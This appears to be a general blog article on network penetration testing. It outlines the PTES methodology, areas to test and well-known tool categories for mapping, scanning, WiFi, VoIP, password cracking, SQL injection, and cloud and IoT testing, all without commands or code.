One of the most important parts in the field of security systems is the security of computer networks. Network penetration testing or network pen testing is a part of the procedure of penetration testing in an organization.
Network pen testing can be performed in conjunction with other types of penetration tests or planned as a separate part of the security procedures.
The purpose of the network security tests is to identify potential threats in Internet connections, corporate networks, VPN, local networks of organizations, wireless access, and cloud systems.
Internet connections, firewalls, routers, hubs, wireless access points, servers, workstation, and desktop computers, and IOT devices must all be checked as part of this testing.
Fundamental principles of network security tests
Network penetration testing methodology uses the Penetration Testing Execution Standard (PTES). It specifies seven steps to be performed:
- Pre-engagement Interactions
- Intelligence Gathering
- Threat Modeling
- Vulnerability Analysis
- Exploitation
- Post Exploitation
- Reporting
Also, the Information Systems Security Assessment Framework (ISSAF) can be helpful in designing a comprehensive network security tests plan. Network penetration testing may have three main phases on the top level.
The following parts of information systems need to be checked during network pen testing:
- CDP attacks (Spoofing)
- DNS enum/AXFR
- SMTP relay
- SNMP recon
- port security
- brute force
- encryption testing
- password weakness
- detect using http instead of https
What are the best network penetration testing tools?
Now we will take a closer look at network penetration testing tools. First of all, we recommend using Kali Linux (open source distribution based on Debian developed by Offensive Security). It focuses on providing penetration testing and security auditing tools. There are, however, more than 600 specific tools for network penetration testing procedures.
Also using the OSINT framework is very helpful for categorizing and collecting information about necessary network resources for pen testing. There is a large number of penetration tools available, and we will look at the main tools by type. The most popular network penetration testing tools are Nexpose, Nipper, W3AF, Wireshark, Metasploit.
Penetration Testing Frameworks
The most advanced and powerful testing framework is Metasploit. It can configure and run payload on the system and trying to ‘exploit’ system for pen testing. This allows scanning web applications, networks, servers, desktops, mobile devices.
Network Mapping
The popular network mapper tools are Nmap and Fierce. They allow doing host discovery, port scanning, operation system detection, application version detection, IP range scanning, name server discovery.
Network Scanning
The popular network scanners and sniffers are Netcat, Unicornscan, OpenVAS, Nikto. They can work with TCP and UDP connections, analyze reverse and forward DNS records, scan local and remote ports.
WiFi Penetration Testing
To test penetration on WiFi wireless networks Fluxion, Aircrack-ng, Kismet Wireless, Yersinia can be used. They can test 802.1q and 802.1x wireless networks, spawns an MDK3 process, WPA/WPA2-PSK analyzers, packet sniffing and injecting.
VOIP Penetration Testing
VOIP systems are also a very important part to be tested and many tools allow to make pen testing for these devices. For instance Wireshark, Viproy VOIP kit can capture VOIP calls and try to decode them, perform pen test for SIP/SDP and MSRP problems in the system.
Cryptography Penetration Testing
Cryptography testing tools (John the Ripper, THC Hydra, findmyhash, RainbowCrack) allows testing coding of information for potential problems in the networks for detecting sessions with weak encryption methods. With parallel brute force cracking attacks these tools have the power to detect weak passwords, empty hashes, use dictionary attack lists, etc. Such tools can use GPU to make brute force attacks, so weak, old and simple cryptography methods can be compromised.
SQL Penetration Testing
SQL database can be also a target for attacks. Tools like SQL Injection Scanner, sqlmap will be helpful in this case to avoid possible SQL injection and prevent data leaks.
Additional tools
Special attention should be paid to the means of collecting information from social networks and other open information sources on the Internet:
- WPScan
- CMSMap
- Social Engineering Toolkit
The complexity of the network penetration test
The difficulty with conducting network pen testing is that all possible places of penetration should be checked b so there are a lot of parameters.
In a real attack on the organization’s network, the attacker tries to find any vulnerability on any device, and then, having gained access to the network starts an attack on other computers and collects information inside the network.
This is especially likely when unencrypted protocols for authorization, access to databases, etc. are being used.
Therefore, automated network penetration testing should be carefully planned and, if possible, should simulate the behavior of real penetration into the system.
Only one minor vulnerability in the network can provide an opportunity for an attacker to penetrate the system and try to gain access to all critical organization resources - “the chain cannot be stronger than its weakest link”.
Cloud network penetration testing
Network penetration tests on cloud systems must first be coordinated with the system provider (some of them have strict requirements for this type of testing).
In the case of a cloud penetration test, the main object of testing can be an application, services, and/or API. This is due to the fact that networks and network devices are already maximally and safely configured by cloud providers.
Three aspects of the results need to be analyzed:
- Staff's response to testing (did administrators and DevOps notice that a test attack was conducted and how they informed and compiled a report)
- Automated protection system response and possible automatic actions to block intrusion (if used in the current configuration)
- Security Improvement Plan
IoT Network Penetration Testing
An important part of the network penetration test is the analysis of the penetration of IoT devices.
These devices are often associated with very important functions and can bring serious risks with unauthorized access in such areas:
- Medical / Healthcare
- Industrial Control Systems
- Smart Home Automation
- Wearable devices
- Energy/Utility counters
- Automotive
A big challenge in penetration testing into IoT devices is their use of wireless protocols (WiFi, Bluetooth, NFC, Zbee, etc.)
Another difficulty in conducting penetration testing in IoT is the huge number of devices used (from hundreds to hundreds of thousands). The diversity of IoT systems also complicates the task.
In the most common case, the penetration test in the IoT system affects the main components, namely:
- IoT connection to wifi or local network
- A connection from the wireless router to server or cloud system
- Databases and information in the processing systems
- Client-server applications, including user application and API
The same tools, such as Metasploit framework, port scanners, and traffic analyzers for testing the penetration of IoT systems.
Takeaways
Planning for regular penetration tests is the number one priority for most organizations.
The main danger of unauthorized entry into the information system from the network is that an attacker can use the access to the system for years and go unnoticed.
And with the development of cloud technologies and mass service systems, millions of users may suffer damage from unauthorized access.
Experience shows that network penetration testing should be carried out continuously for critical functions in organizations. It is better to use several companies to provide better testing coverage and to get recommendations from several teams. This practice always gives more comprehensive results than internal network penetration testing.